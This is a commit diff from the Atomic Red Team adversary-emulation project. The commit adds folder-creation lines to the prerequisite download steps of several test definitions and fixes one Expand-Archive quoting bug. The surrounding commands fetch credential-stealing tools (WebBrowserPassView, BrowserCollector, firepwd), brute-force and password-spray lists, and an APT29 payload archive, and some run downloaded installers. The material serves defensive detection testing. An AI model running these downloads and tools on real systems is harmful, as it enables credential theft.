Generated docs from job=generate-docs branch=master [ci skip]

redcanaryco · Sep 29, 2023 · ccdf46f · ccdf46f
1 parent f68822b
commit ccdf46f
Show file tree

Hide file tree

Showing 7 changed files with 55 additions and 41 deletions.
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
@@ -21806,6 +21806,7 @@ defense-evasion:
 
           '
         get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip"
           Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\" -Force
@@ -85914,10 +85915,9 @@ credential-access:
           0} else {exit 1}
 
           '
-        get_prereq_command: 'invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true"
-          -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt"
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt"
       executor:
         name: powershell
         elevation_required: false
@@ -89515,6 +89515,7 @@ credential-access:
 
           '
         get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
           Expand-Archive "#{file_path}\Modified-SysInternalsSuite.zip" "#{file_path}\sysinternals" -Force
@@ -89754,10 +89755,9 @@ credential-access:
         prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py"
-          -outfile "#{Firepwd_Path}"
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
       - description: 'Firefox profile directory must be present
 
           '
@@ -89780,6 +89780,7 @@ credential-access:
 
           '
         get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
           invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe"
           write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe."
       - description: 'Python must be installed
@@ -89789,6 +89790,7 @@ credential-access:
 
           '
         get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
           invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
           Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
       - description: 'Pip must be installed.
@@ -89797,7 +89799,8 @@ credential-access:
         prereq_command: |
           $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
           if (pip -v) {exit 0} else {exit 1}
-        get_prereq_command: "invoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
+        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
+          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
           -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
           \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
           /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
@@ -89969,10 +89972,9 @@ credential-access:
           {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe
-          -OutFile "#{webbrowserpassview_path}"
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction ignore -Force | Out-Null
+          Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile "#{webbrowserpassview_path}"
       executor:
         command: |
           Start-Process "#{webbrowserpassview_path}"
@@ -90011,8 +90013,9 @@ credential-access:
           {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe"
-          -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe"'
+        get_prereq_command: |-
+          New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe"
       - description: 'Login Data file that is a copy of a chrome Login Data that contains
           credentials for the tool to "steal." Must exist at the specified path.
 
@@ -91666,10 +91669,9 @@ credential-access:
           0} else {exit 1}
 
           '
-        get_prereq_command: 'invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true"
-          -outfile "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt"
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt"
       executor:
         name: powershell
         elevation_required: false
@@ -100946,7 +100948,7 @@ discovery:
           $parentpath = Split-Path "#{dirlister_path}"
           New-Item -ItemType Directory -Force -Path $parentpath | Out-Null
           Invoke-WebRequest https://github.com/SanderSade/DirLister/releases/download/v2.beta4/DirLister.v2.beta4.zip -OutFile "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip"
-          Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4 -Force"
+          Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4" -Force
           Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4\*" "$parentpath" -Recurse
           Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip","PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4" -Recurse -ErrorAction Ignore
       executor:

diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml
@@ -18619,6 +18619,7 @@ defense-evasion:
 
           '
         get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip"
           Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\" -Force
@@ -74007,10 +74008,9 @@ credential-access:
           0} else {exit 1}
 
           '
-        get_prereq_command: 'invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true"
-          -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt"
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt"
       executor:
         name: powershell
         elevation_required: false
@@ -76831,6 +76831,7 @@ credential-access:
 
           '
         get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
           Expand-Archive "#{file_path}\Modified-SysInternalsSuite.zip" "#{file_path}\sysinternals" -Force
@@ -77052,10 +77053,9 @@ credential-access:
         prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py"
-          -outfile "#{Firepwd_Path}"
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
       - description: 'Firefox profile directory must be present
 
           '
@@ -77078,6 +77078,7 @@ credential-access:
 
           '
         get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
           invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe"
           write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe."
       - description: 'Python must be installed
@@ -77087,6 +77088,7 @@ credential-access:
 
           '
         get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
           invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
           Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
       - description: 'Pip must be installed.
@@ -77095,7 +77097,8 @@ credential-access:
         prereq_command: |
           $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
           if (pip -v) {exit 0} else {exit 1}
-        get_prereq_command: "invoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
+        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
+          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
           -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
           \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
           /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
@@ -77215,10 +77218,9 @@ credential-access:
           {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe
-          -OutFile "#{webbrowserpassview_path}"
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction ignore -Force | Out-Null
+          Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile "#{webbrowserpassview_path}"
       executor:
         command: |
           Start-Process "#{webbrowserpassview_path}"
@@ -77257,8 +77259,9 @@ credential-access:
           {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe"
-          -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe"'
+        get_prereq_command: |-
+          New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe"
       - description: 'Login Data file that is a copy of a chrome Login Data that contains
           credentials for the tool to "steal." Must exist at the specified path.
 
@@ -78711,10 +78714,9 @@ credential-access:
           0} else {exit 1}
 
           '
-        get_prereq_command: 'invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true"
-          -outfile "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt"
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt"
       executor:
         name: powershell
         elevation_required: false
@@ -86394,7 +86396,7 @@ discovery:
           $parentpath = Split-Path "#{dirlister_path}"
           New-Item -ItemType Directory -Force -Path $parentpath | Out-Null
           Invoke-WebRequest https://github.com/SanderSade/DirLister/releases/download/v2.beta4/DirLister.v2.beta4.zip -OutFile "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip"
-          Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4 -Force"
+          Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4" -Force
           Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4\*" "$parentpath" -Recurse
           Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip","PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4" -Recurse -ErrorAction Ignore
       executor:

diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
@@ -439,6 +439,7 @@ if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip"
 Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\" -Force

diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md
@@ -277,7 +277,7 @@ if (Test-Path "#{dirlister_path}") {exit 0} else {exit 1}
 $parentpath = Split-Path "#{dirlister_path}"
 New-Item -ItemType Directory -Force -Path $parentpath | Out-Null
 Invoke-WebRequest https://github.com/SanderSade/DirLister/releases/download/v2.beta4/DirLister.v2.beta4.zip -OutFile "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip"
-Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4 -Force"
+Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4" -Force
 Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4\*" "$parentpath" -Recurse
 Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip","PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4" -Recurse -ErrorAction Ignore
 ```

diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md
@@ -246,6 +246,7 @@ if (test-path "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt"){exit 0} e
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt"
 ```
 

diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md
@@ -461,6 +461,7 @@ if (test-path "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt"){exit
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt"
 ```